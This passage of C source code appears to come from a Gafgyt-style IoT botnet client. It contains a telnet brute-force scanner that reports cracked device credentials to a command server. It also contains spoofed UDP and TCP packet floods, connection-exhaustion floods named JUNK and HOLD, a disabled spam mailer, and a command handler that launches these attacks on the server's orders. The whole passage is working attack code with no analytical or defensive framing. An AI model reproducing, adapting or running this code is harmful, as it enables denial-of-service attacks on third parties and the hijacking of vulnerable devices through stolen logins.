978. else fds[i].state = 7;
979. memset(fds[i].sockbuf, 0, 1024);
980. continue;
981. } else {
982. fds[i].bufUsed = strlen(fds[i].sockbuf);
983. }
984.  
985. if(fds[i].totalTimeout + 30 < time(NULL))
986. {
987. sclose(fds[i].fd);
988. fds[i].state = 0;
989. fds[i].complete = 1;
990. }
991. }
992. break;
993.  
994. case 7:
995. {
996. if(send(fds[i].fd, "sh\r\n", 4, MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
997. fds[i].state = 8;
998. }
999. break;
1000.  
1001. case 8:
1002. {
1003. if(send(fds[i].fd, "/bin/busybox;echo -e '\\147\\141\\171\\146\\147\\164'\r\n", 49, MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
1004. fds[i].state = 9;
1005. }
1006. break;
1007.  
1008. case 9:
1009. {
1010. if(fds[i].totalTimeout == 0) fds[i].totalTimeout = time(NULL);
1011.  
1012. if(readUntil(fds[i].fd, "gayfgt", 0, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed))
1013. {
1014. fds[i].totalTimeout = 0;
1015. fds[i].bufUsed = 0;
1016. if(strstr(fds[i].sockbuf, "multi-call") != NULL) sockprintf(mainCommSock, "REPORT %s:%s:%s", inet_ntoa(*(struct in_addr *)&(fds[i].ip)), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]);
1017. memset(fds[i].sockbuf, 0, 1024);
1018. sclose(fds[i].fd);
1019. fds[i].complete = 1;
1020. //fds[i].lastWorked = 1;
1021. fds[i].state = 0;
1022. continue;
1023. } else {
1024. fds[i].bufUsed = strlen(fds[i].sockbuf);
1025. }
1026.  
1027. if(fds[i].totalTimeout + 30 < time(NULL))
1028. {
1029. sclose(fds[i].fd);
1030. fds[i].state = 0;
1031. fds[i].complete = 1;
1032. }
1033. }
1034. break;
1035.  
1036. case 100:
1037. {
1038. if(send(fds[i].fd, "sh\r\n", 4, MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
1039. fds[i].state = 101;
1040. }
1041. break;
1042.  
1043. case 101:
1044. {
1045. if(send(fds[i].fd, "/bin/busybox;echo -e '\\147\\141\\171\\146\\147\\164'\r\n", 49, MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
1046. fds[i].state = 102;
1047. }
1048. break;
1049.  
1050. case 102:
1051. {
1052. if(fds[i].totalTimeout == 0) fds[i].totalTimeout = time(NULL);
1053.  
1054. if(readUntil(fds[i].fd, "multi-call", 0, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed))
1055. {
1056. fds[i].totalTimeout = 0;
1057. fds[i].bufUsed = 0;
1058. sockprintf(mainCommSock, "REPORT %s:%s:", inet_ntoa(*(struct in_addr *)&(fds[i].ip)), usernames[fds[i].usernameInd]);
1059. sclose(fds[i].fd);
1060. fds[i].state = 0;
1061. memset(fds[i].sockbuf, 0, 1024);
1062. fds[i].complete = 1;
1063. //fds[i].lastWorked = 1;
1064. continue;
1065. } else {
1066. fds[i].bufUsed = strlen(fds[i].sockbuf);
1067. }
1068.  
1069. if(fds[i].totalTimeout + 30 < time(NULL))
1070. {
1071. sclose(fds[i].fd);
1072. fds[i].state = 0;
1073. fds[i].complete = 1;
1074. }
1075. }
1076. break;
1077. }
1078. }
1079. }
1080. }
1081.  
1082. // ___ ___ ___ _ _
1083. // /\ /\ / \/ _ \ / __\ | ___ ___ __| |
1084. // / / \ \/ /\ / /_)/ / _\ | |/ _ \ / _ \ / _` |
1085. // \ \_/ / /_// ___/ / / | | (_) | (_) | (_| |
1086. // \___/___,'\/ \/ |_|\___/ \___/ \__,_|
1087.  
1088. void sendUDP(unsigned char *target, int port, int timeEnd, int spoofit, int packetsize, int pollinterval)
1089. {
1090. struct sockaddr_in dest_addr;
1091.  
1092. dest_addr.sin_family = AF_INET;
1093. if(port == 0) dest_addr.sin_port = rand_cmwc();
1094. else dest_addr.sin_port = htons(port);
1095. if(getHost(target, &dest_addr.sin_addr)) return;
1096. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
1097.  
1098. register unsigned int pollRegister;
1099. pollRegister = pollinterval;
1100.  
1101. if(spoofit == 32)
1102. {
1103. int sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
1104. if(!sockfd)
1105. {
1106. sockprintf(mainCommSock, "Failed opening raw socket.");
1107. return;
1108. }
1109.  
1110. unsigned char *buf = (unsigned char *)malloc(packetsize + 1);
1111. if(buf == NULL) return;
1112. memset(buf, 0, packetsize + 1);
1113. makeRandomStr(buf, packetsize);
1114.  
1115. int end = time(NULL) + timeEnd;
1116. register unsigned int i = 0;
1117. while(1)
1118. {
1119. sendto(sockfd, buf, packetsize, 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
1120.  
1121. if(i == pollRegister)
1122. {
1123. if(port == 0) dest_addr.sin_port = rand_cmwc();
1124. if(time(NULL) > end) break;
1125. i = 0;
1126. continue;
1127. }
1128. i++;
1129. }
1130. } else {
1131. int sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_UDP);
1132. if(!sockfd)
1133. {
1134. sockprintf(mainCommSock, "Failed opening raw socket.");
1135. return;
1136. }
1137.  
1138. int tmp = 1;
1139. if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &tmp, sizeof (tmp)) < 0)
1140. {
1141. sockprintf(mainCommSock, "Failed setting raw headers mode.");
1142. return;
1143. }
1144.  
1145. int counter = 50;
1146. while(counter--)
1147. {
1148. srand(time(NULL) ^ rand_cmwc());
1149. init_rand(rand());
1150. }
1151.  
1152. in_addr_t netmask;
1153.  
1154. if ( spoofit == 0 ) netmask = ( ~((in_addr_t) -1) );
1155. else netmask = ( ~((1 << (32 - spoofit)) - 1) );
1156.  
1157. unsigned char packet[sizeof(struct iphdr) + sizeof(struct udphdr) + packetsize];
1158. struct iphdr *iph = (struct iphdr *)packet;
1159. struct udphdr *udph = (void *)iph + sizeof(struct iphdr);
1160.  
1161. makeIPPacket(iph, dest_addr.sin_addr.s_addr, htonl( getRandomIP(netmask) ), IPPROTO_UDP, sizeof(struct udphdr) + packetsize);
1162.  
1163. udph->len = htons(sizeof(struct udphdr) + packetsize);
1164. udph->source = rand_cmwc();
1165. udph->dest = (port == 0 ? rand_cmwc() : htons(port));
1166. udph->check = 0;
1167.  
1168. makeRandomStr((unsigned char*)(((unsigned char *)udph) + sizeof(struct udphdr)), packetsize);
1169.  
1170. iph->check = csum ((unsigned short *) packet, iph->tot_len);
1171.  
1172. int end = time(NULL) + timeEnd;
1173. register unsigned int i = 0;
1174. while(1)
1175. {
1176. sendto(sockfd, packet, sizeof(packet), 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
1177.  
1178. udph->source = rand_cmwc();
1179. udph->dest = (port == 0 ? rand_cmwc() : htons(port));
1180. iph->id = rand_cmwc();
1181. iph->saddr = htonl( getRandomIP(netmask) );
1182. iph->check = csum ((unsigned short *) packet, iph->tot_len);
1183.  
1184. if(i == pollRegister)
1185. {
1186. if(time(NULL) > end) break;
1187. i = 0;
1188. continue;
1189. }
1190. i++;
1191. }
1192. }
1193. }
1194.  
1195. // _____ ___ ___ ___ _ _
1196. // /__ \/ __\ / _ \ / __\ | ___ ___ __| |
1197. // / /\/ / / /_)/ / _\ | |/ _ \ / _ \ / _` |
1198. // / / / /___/ ___/ / / | | (_) | (_) | (_| |
1199. // \/ \____/\/ \/ |_|\___/ \___/ \__,_|
1200.  
1201. void sendTCP(unsigned char *target, int port, int timeEnd, int spoofit, unsigned char *flags, int packetsize, int pollinterval)
1202. {
1203. register unsigned int pollRegister;
1204. pollRegister = pollinterval;
1205.  
1206. struct sockaddr_in dest_addr;
1207.  
1208. dest_addr.sin_family = AF_INET;
1209. if(port == 0) dest_addr.sin_port = rand_cmwc();
1210. else dest_addr.sin_port = htons(port);
1211. if(getHost(target, &dest_addr.sin_addr)) return;
1212. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
1213.  
1214. int sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP);
1215. if(!sockfd)
1216. {
1217. sockprintf(mainCommSock, "Failed opening raw socket.");
1218. return;
1219. }
1220.  
1221. int tmp = 1;
1222. if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &tmp, sizeof (tmp)) < 0)
1223. {
1224. sockprintf(mainCommSock, "Failed setting raw headers mode.");
1225. return;
1226. }
1227.  
1228. in_addr_t netmask;
1229.  
1230. if ( spoofit == 0 ) netmask = ( ~((in_addr_t) -1) );
1231. else netmask = ( ~((1 << (32 - spoofit)) - 1) );
1232.  
1233. unsigned char packet[sizeof(struct iphdr) + sizeof(struct tcphdr) + packetsize];
1234. struct iphdr *iph = (struct iphdr *)packet;
1235. struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
1236.  
1237. makeIPPacket(iph, dest_addr.sin_addr.s_addr, htonl( getRandomIP(netmask) ), IPPROTO_TCP, sizeof(struct tcphdr) + packetsize);
1238.  
1239. tcph->source = rand_cmwc();
1240. tcph->seq = rand_cmwc();
1241. tcph->ack_seq = 0;
1242. tcph->doff = 5;
1243.  
1244. if(!strcmp(flags, "all"))
1245. {
1246. tcph->syn = 1;
1247. tcph->rst = 1;
1248. tcph->fin = 1;
1249. tcph->ack = 1;
1250. tcph->psh = 1;
1251. } else {
1252. unsigned char *pch = strtok(flags, ",");
1253. while(pch)
1254. {
1255. if(!strcmp(pch, "syn"))
1256. {
1257. tcph->syn = 1;
1258. } else if(!strcmp(pch, "rst"))
1259. {
1260. tcph->rst = 1;
1261. } else if(!strcmp(pch, "fin"))
1262. {
1263. tcph->fin = 1;
1264. } else if(!strcmp(pch, "ack"))
1265. {
1266. tcph->ack = 1;
1267. } else if(!strcmp(pch, "psh"))
1268. {
1269. tcph->psh = 1;
1270. } else {
1271. sockprintf(mainCommSock, "Invalid flag \"%s\"", pch);
1272. }
1273. pch = strtok(NULL, ",");
1274. }
1275. }
1276.  
1277. tcph->window = rand_cmwc();
1278. tcph->check = 0;
1279. tcph->urg_ptr = 0;
1280. tcph->dest = (port == 0 ? rand_cmwc() : htons(port));
1281. tcph->check = tcpcsum(iph, tcph);
1282.  
1283. iph->check = csum ((unsigned short *) packet, iph->tot_len);
1284.  
1285. int end = time(NULL) + timeEnd;
1286. register unsigned int i = 0;
1287. while(1)
1288. {
1289. sendto(sockfd, packet, sizeof(packet), 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
1290.  
1291. iph->saddr = htonl( getRandomIP(netmask) );
1292. iph->id = rand_cmwc();
1293. tcph->seq = rand_cmwc();
1294. tcph->source = rand_cmwc();
1295. tcph->check = 0;
1296. tcph->check = tcpcsum(iph, tcph);
1297. iph->check = csum ((unsigned short *) packet, iph->tot_len);
1298.  
1299. if(i == pollRegister)
1300. {
1301. if(time(NULL) > end) break;
1302. i = 0;
1303. continue;
1304. }
1305. i++;
1306. }
1307. }
1308.  
1309.  
1310. // __ __ ___ _ _
1311. // \ \ /\ /\ /\ \ \/\ /\ / __\ | ___ ___ __| |
1312. // \ \/ / \ \/ \/ / //_/ / _\ | |/ _ \ / _ \ / _` |
1313. // /\_/ /\ \_/ / /\ / __ \ / / | | (_) | (_) | (_| |
1314. // \___/ \___/\_\ \/\/ \/ \/ |_|\___/ \___/ \__,_|
1315.  
1316. void sendJUNK(unsigned char *ip, int port, int end_time)
1317. {
1318.  
1319. int max = getdtablesize() / 2, i;
1320.  
1321. struct sockaddr_in dest_addr;
1322. dest_addr.sin_family = AF_INET;
1323. dest_addr.sin_port = htons(port);
1324. if(getHost(ip, &dest_addr.sin_addr)) return;
1325. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
1326.  
1327. struct state_t
1328. {
1329. int fd;
1330. uint8_t state;
1331. } fds[max];
1332. memset(fds, 0, max * (sizeof(int) + 1));
1333.  
1334. fd_set myset;
1335. struct timeval tv;
1336. socklen_t lon;
1337. int valopt, res;
1338.  
1339. unsigned char *watwat = malloc(1024);
1340. memset(watwat, 0, 1024);
1341.  
1342. int end = time(NULL) + end_time;
1343. while(end > time(NULL))
1344. {
1345. for(i = 0; i < max; i++)
1346. {
1347. switch(fds[i].state)
1348. {
1349. case 0:
1350. {
1351. fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
1352. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
1353. if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) != -1 || errno != EINPROGRESS) close(fds[i].fd);
1354. else fds[i].state = 1;
1355. }
1356. break;
1357.  
1358. case 1:
1359. {
1360. FD_ZERO(&myset);
1361. FD_SET(fds[i].fd, &myset);
1362. tv.tv_sec = 0;
1363. tv.tv_usec = 10000;
1364. res = select(fds[i].fd+1, NULL, &myset, NULL, &tv);
1365. if(res == 1)
1366. {
1367. lon = sizeof(int);
1368. getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
1369. if(valopt)
1370. {
1371. close(fds[i].fd);
1372. fds[i].state = 0;
1373. } else {
1374. fds[i].state = 2;
1375. }
1376. } else if(res == -1)
1377. {
1378. close(fds[i].fd);
1379. fds[i].state = 0;
1380. }
1381. }
1382. break;
1383.  
1384. case 2:
1385. {
1386. //nonblocking sweg
1387. makeRandomStr(watwat, 1024);
1388. if(send(fds[i].fd, watwat, 1024, MSG_NOSIGNAL) == -1 && errno != EAGAIN)
1389. {
1390. close(fds[i].fd);
1391. fds[i].state = 0;
1392. }
1393. }
1394. break;
1395. }
1396. }
1397. }
1398. }
1399.  
1400. // _ _ ___ _ _
1401. // /\ /\___ | | __| | / __\ | ___ ___ __| |
1402. // / /_/ / _ \| |/ _` | / _\ | |/ _ \ / _ \ / _` |
1403. // / __ / (_) | | (_| | / / | | (_) | (_) | (_| |
1404. // \/ /_/ \___/|_|\__,_| \/ |_|\___/ \___/ \__,_|
1405.  
1406. void sendHOLD(unsigned char *ip, int port, int end_time)
1407. {
1408.  
1409. int max = getdtablesize() / 2, i;
1410.  
1411. struct sockaddr_in dest_addr;
1412. dest_addr.sin_family = AF_INET;
1413. dest_addr.sin_port = htons(port);
1414. if(getHost(ip, &dest_addr.sin_addr)) return;
1415. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
1416.  
1417. struct state_t
1418. {
1419. int fd;
1420. uint8_t state;
1421. } fds[max];
1422. memset(fds, 0, max * (sizeof(int) + 1));
1423.  
1424. fd_set myset;
1425. struct timeval tv;
1426. socklen_t lon;
1427. int valopt, res;
1428.  
1429. unsigned char *watwat = malloc(1024);
1430. memset(watwat, 0, 1024);
1431.  
1432. int end = time(NULL) + end_time;
1433. while(end > time(NULL))
1434. {
1435. for(i = 0; i < max; i++)
1436. {
1437. switch(fds[i].state)
1438. {
1439. case 0:
1440. {
1441. fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
1442. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
1443. if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) != -1 || errno != EINPROGRESS) close(fds[i].fd);
1444. else fds[i].state = 1;
1445. }
1446. break;
1447.  
1448. case 1:
1449. {
1450. FD_ZERO(&myset);
1451. FD_SET(fds[i].fd, &myset);
1452. tv.tv_sec = 0;
1453. tv.tv_usec = 10000;
1454. res = select(fds[i].fd+1, NULL, &myset, NULL, &tv);
1455. if(res == 1)
1456. {
1457. lon = sizeof(int);
1458. getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
1459. if(valopt)
1460. {
1461. close(fds[i].fd);
1462. fds[i].state = 0;
1463. } else {
1464. fds[i].state = 2;
1465. }
1466. } else if(res == -1)
1467. {
1468. close(fds[i].fd);
1469. fds[i].state = 0;
1470. }
1471. }
1472. break;
1473.  
1474. case 2:
1475. {
1476. FD_ZERO(&myset);
1477. FD_SET(fds[i].fd, &myset);
1478. tv.tv_sec = 0;
1479. tv.tv_usec = 10000;
1480. res = select(fds[i].fd+1, NULL, NULL, &myset, &tv);
1481. if(res != 0)
1482. {
1483. close(fds[i].fd);
1484. fds[i].state = 0;
1485. }
1486. }
1487. break;
1488. }
1489. }
1490. }
1491. }
1492.  
1493. // __ _ __ _ _
1494. // / _\ ___ _ __ __| | /__\ __ ___ __ _(_) |
1495. // \ \ / _ \ '_ \ / _` | /_\| '_ ` _ \ / _` | | |
1496. // _\ \ __/ | | | (_| | //__| | | | | | (_| | | |
1497. // \__/\___|_| |_|\__,_| \__/|_| |_| |_|\__,_|_|_|
1498.  
1499. /*
1500. void sendEmail(unsigned char *email, unsigned char *host, unsigned char *subject, unsigned char *message)
1501. {
1502. unsigned char buffer[1024];
1503. memset(buffer, 0, 1024);
1504.  
1505. int fd = socket(AF_INET, SOCK_STREAM, 0);
1506. if(!connectTimeout(fd, host, 25, 30)) { close(fd); return; }
1507. if(fdgets(buffer, 1024, fd) == NULL) { close(fd); return; }
1508. if(strstr(buffer, "220 ") == NULL) { close(fd); return; }
1509.  
1510. if(send(fd, "HELO rastrent.com\r\n", 19, MSG_NOSIGNAL) != 19) { close(fd); return; }
1511. if(fdgets(buffer, 1024, fd) == NULL) { close(fd); return; }
1512. if(strstr(buffer, "250 ") == NULL) { close(fd); return; }
1513. memset(buffer, 0, 1024);
1514.  
1515. if(send(fd, "MAIL FROM: <mrras@rastrent.com>\r\n", 33, MSG_NOSIGNAL) != 33) { close(fd); return; }
1516. if(fdgets(buffer, 1024, fd) == NULL) { close(fd); return; }
1517. if(strstr(buffer, "250 ") == NULL) { close(fd); return; }
1518. memset(buffer, 0, 1024);
1519.  
1520. if(send(fd, "RCPT TO: <", 10, MSG_NOSIGNAL) != 10) { close(fd); return; }
1521. if(send(fd, email, strlen(email), MSG_NOSIGNAL) != strlen(email)) { close(fd); return; }
1522. if(send(fd, ">\r\n", 3, MSG_NOSIGNAL) != 3) { close(fd); return; }
1523. if(fdgets(buffer, 1024, fd) == NULL) { close(fd); return; }
1524. if(strstr(buffer, "250 ") == NULL) { close(fd); return; }
1525. memset(buffer, 0, 1024);
1526.  
1527. if(send(fd, "DATA\r\n", 6, MSG_NOSIGNAL) != 6) { close(fd); return; }
1528. if(fdgets(buffer, 1024, fd) == NULL) { close(fd); return; }
1529. if(strstr(buffer, "354 ") == NULL) { close(fd); return; }
1530. memset(buffer, 0, 1024);
1531.  
1532. if(send(fd, "To: ", 4, MSG_NOSIGNAL) != 4) { close(fd); return; }
1533. if(send(fd, email, strlen(email), MSG_NOSIGNAL) != strlen(email)) { close(fd); return; }
1534. if(send(fd, "\r\nFrom: mrras@rastrent.com\r\nSubject: ", 38, MSG_NOSIGNAL) != 38) { close(fd); return; }
1535. if(send(fd, subject, strlen(subject), MSG_NOSIGNAL) != strlen(subject)) { close(fd); return; }
1536. if(send(fd, "\r\n\r\n", 4, MSG_NOSIGNAL) != 4) { close(fd); return; }
1537. if(send(fd, message, strlen(message), MSG_NOSIGNAL) != strlen(message)) { close(fd); return; }
1538. if(send(fd, "\r\n.\r\n", 5, MSG_NOSIGNAL) != 5) { close(fd); return; }
1539. if(fdgets(buffer, 1024, fd) == NULL) { close(fd); return; }
1540. if(strstr(buffer, "250 ") == NULL) { close(fd); return; }
1541. memset(buffer, 0, 1024);
1542.  
1543. send(fd, "QUIT\r\n", 6, MSG_NOSIGNAL);
1544.  
1545. close(fd);
1546. return;
1547. }
1548. */
1549.  
1550. // _____ __ ___ _
1551. // \_ \/__\ / __\ /\/\ __ _(_)_ __
1552. // / /\/ \// / / / \ / _` | | '_ \
1553. // /\/ /_/ _ \/ /___ / /\/\ \ (_| | | | | |
1554. // \____/\/ \_/\____/ \/ \/\__,_|_|_| |_|
1555.  
1556. void processCmd(int argc, unsigned char *argv[])
1557. {
1558. if(!strcmp(argv[0], "PING"))
1559. {
1560. sockprintf(mainCommSock, "PONG!");
1561. return;
1562. }
1563.  
1564. if(!strcmp(argv[0], "GETLOCALIP"))
1565. {
1566. sockprintf(mainCommSock, "My IP: %s", inet_ntoa(ourIP));
1567. return;
1568. }
1569.  
1570. if(!strcmp(argv[0], "SCANNER"))
1571. {
1572. if(argc != 2)
1573. {
1574. sockprintf(mainCommSock, "SCANNER ON | OFF");
1575. return;
1576. }
1577.  
1578. if(!strcmp(argv[1], "OFF"))
1579. {
1580. if(scanPid == 0) return;
1581.  
1582. kill(scanPid, 9);
1583. scanPid = 0;
1584. }
1585.  
1586. if(!strcmp(argv[1], "ON"))
1587. {
1588. if(scanPid != 0) return;
1589. uint32_t parent;
1590. parent = fork();
1591. if (parent > 0) { scanPid = parent; return;}
1592. else if(parent == -1) return;
1593.  
1594. StartTheLelz();
1595. _exit(0);
1596. }
1597. }
1598.  
1599. /*
1600. if(!strcmp(argv[0], "EMAIL"))
1601. {
1602. if(argc < 5)
1603. {
1604. //sockprintf(mainCommSock, "EMAIL <target email> <mx host> <subject no spaces> <message no spaces>");
1605. return;
1606. }
1607.  
1608. unsigned char *target = argv[1];
1609. unsigned char *host = argv[2];
1610. unsigned char *subject = argv[3];
1611. unsigned char *message = argv[4];
1612.  
1613. if (listFork()) { return; }
1614.  
1615. sendEmail(target, host, subject, message);
1616. close(mainCommSock);
1617.  
1618. _exit(0);
1619. }
1620. */
1621.  
1622. if(!strcmp(argv[0], "HOLD"))
1623. {
1624. if(argc < 4 || atoi(argv[2]) < 1 || atoi(argv[3]) < 1)
1625. {
1626. //sockprintf(mainCommSock, "HOLD <ip> <port> <time>");
1627. return;
1628. }
1629.  
1630. unsigned char *ip = argv[1];
1631. int port = atoi(argv[2]);
1632. int time = atoi(argv[3]);
1633.  
1634. if(strstr(ip, ",") != NULL)
1635. {
1636. sockprintf(mainCommSock, "HOLD Flooding %s:%d for %d seconds.", ip, port, time);
1637. unsigned char *hi = strtok(ip, ",");
1638. while(hi != NULL)
1639. {
1640. if(!listFork())
1641. {
1642. sendHOLD(hi, port, time);
1643. close(mainCommSock);
1644. _exit(0);
1645. }
1646. hi = strtok(NULL, ",");
1647. }
1648. } else {
1649. if (listFork()) { return; }
1650.  
1651. sockprintf(mainCommSock, "HOLD Flooding %s:%d for %d seconds.", ip, port, time);
1652. sendHOLD(ip, port, time);
1653. close(mainCommSock);
1654.  
1655. _exit(0);
1656. }
1657. }
1658.  
1659. if(!strcmp(argv[0], "JUNK"))
1660. {
1661. if(argc < 4 || atoi(argv[2]) < 1 || atoi(argv[3]) < 1)
1662. {
1663. //sockprintf(mainCommSock, "JUNK <ip> <port> <time>");
1664. return;
1665. }
1666.  
1667. unsigned char *ip = argv[1];
1668. int port = atoi(argv[2]);
1669. int time = atoi(argv[3]);
1670.  
1671. if(strstr(ip, ",") != NULL)
1672. {
1673. sockprintf(mainCommSock, "JUNK Flooding %s:%d for %d seconds.", ip, port, time);
1674. unsigned char *hi = strtok(ip, ",");
1675. while(hi != NULL)
1676. {
1677. if(!listFork())
1678. {
1679. sendJUNK(hi, port, time);
1680. close(mainCommSock);
1681. _exit(0);
1682. }
1683. hi = strtok(NULL, ",");
1684. }
1685. } else {
1686. if (listFork()) { return; }
1687.  
1688. sockprintf(mainCommSock, "JUNK Flooding %s:%d for %d seconds.", ip, port, time);
1689. sendJUNK(ip, port, time);
1690. close(mainCommSock);
1691.  
1692. _exit(0);
1693. }
1694. }
1695.  
1696. if(!strcmp(argv[0], "UDP"))
1697. {
1698. if(argc < 6 || atoi(argv[3]) == -1 || atoi(argv[2]) == -1 || atoi(argv[4]) == -1 || atoi(argv[5]) == -1 || atoi(argv[5]) > 65500 || atoi(argv[4]) > 32 || (argc == 7 && atoi(argv[6]) < 1))
1699. {
1700. //sockprintf(mainCommSock, "UDP <target> <port (0 for random)> <time> <netmask (32 for non spoofed)> <packet size (1 to 65500)> (time poll interval, default 10)");
1701. return;
1702. }
1703.  
1704. unsigned char *ip = argv[1];
1705. int port = atoi(argv[2]);
1706. int time = atoi(argv[3]);
1707. int spoofed = atoi(argv[4]);
1708. int packetsize = atoi(argv[5]);
1709. int pollinterval = (argc == 7 ? atoi(argv[6]) : 10);
1710.  
1711. if(strstr(ip, ",") != NULL)
1712. {
1713. sockprintf(mainCommSock, "UDP Flooding %s for %d seconds.", ip, time);
1714. unsigned char *hi = strtok(ip, ",");
1715. while(hi != NULL)
1716. {
1717. if(!listFork())
1718. {
1719. sendUDP(hi, port, time, spoofed, packetsize, pollinterval);
1720. close(mainCommSock);
1721. _exit(0);
1722. }
1723. hi = strtok(NULL, ",");
1724. }
1725. } else {
1726. if (listFork()) { return; }
1727.  
1728. sockprintf(mainCommSock, "UDP Flooding %s:%d for %d seconds.", ip, port, time);
1729. sendUDP(ip, port, time, spoofed, packetsize, pollinterval);
1730. close(mainCommSock);
1731.  
1732. _exit(0);
1733. }
1734. }
1735.  
1736. if(!strcmp(argv[0], "TCP"))
1737. {
1738. if(argc < 6 || atoi(argv[3]) == -1 || atoi(argv[2]) == -1 || atoi(argv[4]) == -1 || atoi(argv[4]) > 32 || (argc > 6 && atoi(argv[6]) < 0) || (argc == 8 && atoi(argv[7]) < 1))
1739. {
1740. //sockprintf(mainCommSock, "TCP <target> <port (0 for random)> <time> <netmask (32 for non spoofed)> <flags (syn, ack, psh, rst, fin, all) comma seperated> (packet size, usually 0) (time poll interval, default 10)");
1741. return;
1742. }
1743.  
1744. unsigned char *ip = argv[1];
1745. int port = atoi(argv[2]);
1746. int time = atoi(argv[3]);
1747. int spoofed = atoi(argv[4]);
1748. unsigned char *flags = argv[5];
1749.  
1750. int pollinterval = argc == 8 ? atoi(argv[7]) : 10;
1751. int psize = argc > 6 ? atoi(argv[6]) : 0;
1752.  
1753. if(strstr(ip, ",") != NULL)
1754. {
1755. sockprintf(mainCommSock, "TCP Flooding %s for %d seconds.", ip, time);
1756. unsigned char *hi = strtok(ip, ",");
1757. while(hi != NULL)
1758. {
1759. if(!listFork())
1760. {
1761. sendTCP(hi, port, time, spoofed, flags, psize, pollinterval);
1762. close(mainCommSock);
1763. _exit(0);
1764. }
1765. hi = strtok(NULL, ",");
1766. }
1767. } else {
1768. if (listFork()) { return; }
1769.  
1770. sockprintf(mainCommSock, "TCP Flooding %s for %d seconds.", ip, time);
1771. sendTCP(ip, port, time, spoofed, flags, psize, pollinterval);
1772. close(mainCommSock);
1773.  
1774. _exit(0);
1775. }
1776. }
1777.  
1778. if(!strcmp(argv[0], "KILLATTK"))
1779. {
1780. int killed = 0;
1781. unsigned long i;
1782. for (i = 0; i < numpids; i++) {
1783. if (pids[i] != 0 && pids[i] != getpid()) {
1784. kill(pids[i], 9);
1785. killed++;
1786. }
1787. }
1788.  
1789. if(killed > 0)
1790. {
1791. sockprintf(mainCommSock, "Killed %d.", killed);
1792. } else {
1793. sockprintf(mainCommSock, "None Killed.");
1794. }
1795. }
1796.  
1797. if(!strcmp(argv[0], "LOLNOGTFO"))
1798. {
1799. exit(0);
1800. }
1801. }
1802.  
1803. int initConnection()
1804. {
1805. unsigned char server[512];
1806. memset(server, 0, 512);
1807. if(mainCommSock) { close(mainCommSock); mainCommSock = 0; } //if da sock initialized then close dat
1808. if(currentServer + 1 == SERVER_LIST_SIZE) currentServer = 0;
1809. else currentServer++;
1810.  
1811. strcpy(server, commServer[currentServer]);
1812. int port = 6667;
1813. if(strchr(server, ':') != NULL)
1814. {
1815. port = atoi(strchr(server, ':') + 1);
1816. *((unsigned char *)(strchr(server, ':'))) = 0x0;
1817. }
1818.  
1819. mainCommSock = socket(AF_INET, SOCK_STREAM, 0);
1820.  
1821. if(!connectTimeout(mainCommSock, server, port, 30)) return 1;
1822.  
1823. return 0;
1824. }
1825.  
1826. int getOurIP()
1827. {
1828. int sock = socket(AF_INET, SOCK_DGRAM, 0);
1829. if(sock == -1) return 0;
1830.  
1831. struct sockaddr_in serv;
1832. memset(&serv, 0, sizeof(serv));
1833. serv.sin_family = AF_INET;
1834. serv.sin_addr.s_addr = inet_addr("8.8.8.8");
1835. serv.sin_port = htons(53);
1836.  
1837. int err = connect(sock, (const struct sockaddr*) &serv, sizeof(serv));
1838. if(err == -1) return 0;
1839.  
1840. struct sockaddr_in name;
1841. socklen_t namelen = sizeof(name);
1842. err = getsockname(sock, (struct sockaddr*) &name, &namelen);
1843. if(err == -1) return 0;
1844.  
1845. ourIP.s_addr = name.sin_addr.s_addr;
1846.  
1847. int cmdline = open("/proc/net/route", O_RDONLY);
1848. char linebuf[4096];
1849. while(fdgets(linebuf, 4096, cmdline) != NULL)
1850. {
1851. if(strstr(linebuf, "\t00000000\t") != NULL)
1852. {
1853. unsigned char *pos = linebuf;
1854. while(*pos != '\t') pos++;
1855. *pos = 0;
1856. break;
1857. }
1858. memset(linebuf, 0, 4096);
1859. }
1860. close(cmdline);
1861.  
1862. if(*linebuf)
1863. {
1864. int i;
1865. struct ifreq ifr;
1866. strcpy(ifr.ifr_name, linebuf);
1867. ioctl(sock, SIOCGIFHWADDR, &ifr);
1868. for (i=0; i<6; i++) macAddress[i] = ((unsigned char*)ifr.ifr_hwaddr.sa_data)[i];
1869. }
1870.  
1871. close(sock);
1872. }
1873.  
1874. char *getBuild()
1875. {
1876. #ifdef MIPS_BUILD
1877. return "MIPS";
1878. #elif MIPSEL_BUILD
1879. return "MIPSEL";
1880. #elif X86_BUILD
1881. return "X86";
1882. #elif ARM_BUILD
1883. return "ARM";
1884. #elif PPC_BUILD
1885. return "POWERPC";
1886. #else
1887. return "UNKNOWN";
1888. #endif
1889. }
1890.  
